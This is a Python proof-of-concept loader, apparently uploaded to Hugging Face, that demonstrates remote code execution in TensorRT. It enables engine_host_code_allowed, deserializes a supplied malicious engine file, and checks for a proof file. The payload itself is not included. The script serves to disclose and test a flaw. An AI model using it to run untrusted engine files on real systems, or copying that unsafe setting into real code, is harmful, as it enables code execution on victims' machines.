treforbenbow's picture
Upload load_poc.py with huggingface_hub
ae11452 verified
#!/usr/bin/env python3
"""
PoC Loader: Demonstrates RCE when loading a malicious TensorRT engine file.
Usage: python load_poc.py <path_to_malicious.engine>
"""
import os
import sys
import platform
def main():
if len(sys.argv) < 2:
print("Usage: python load_poc.py <path_to_malicious.engine>")
sys.exit(1)
engine_path = sys.argv[1]
if not os.path.exists(engine_path):
print(f"[!] File not found: {engine_path}")
sys.exit(1)
try:
import tensorrt as trt
except ImportError:
print("[!] tensorrt not installed: pip install tensorrt")
sys.exit(1)
is_windows = platform.system() == "Windows"
poc_file = "tensorrt_rce_poc.txt" if is_windows else "/tmp/tensorrt_rce_poc"
# Clean up any previous proof file
if os.path.exists(poc_file):
os.remove(poc_file)
print("=" * 70)
print("TensorRT Engine RCE PoC — Loading Malicious Engine")
print("=" * 70)
print()
print(f"[*] Engine file: {engine_path}")
print(f"[*] Engine size: {os.path.getsize(engine_path)} bytes")
print(f"[*] TensorRT version: {trt.__version__}")
print()
logger = trt.Logger(trt.Logger.INFO)
runtime = trt.Runtime(logger)
# THIS IS THE CRITICAL LINE — enables loading embedded native code
runtime.engine_host_code_allowed = True
print("[*] runtime.engine_host_code_allowed = True")
print("[*] Calling deserialize_cuda_engine()...")
print("[*] (If RCE works, you'll see output from the embedded code below)")
print()
with open(engine_path, "rb") as f:
engine_data = f.read()
# THIS TRIGGERS THE RCE
engine = runtime.deserialize_cuda_engine(engine_data)
print()
if engine:
print(f"[+] Engine loaded: {engine.num_io_tensors} I/O tensors")
else:
print("[*] Engine returned None (malicious code may still have executed)")
# Check proof file
if os.path.exists(poc_file):
print()
print("=" * 70)
print("[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
print(f"[!!!] Proof file: {poc_file}")
print("=" * 70)
print()
with open(poc_file, "r") as f:
print(f.read())
else:
print()
print(f"[*] Proof file not found at {poc_file}")
print("[*] Check stderr output above for execution evidence")
if __name__ == "__main__":
main()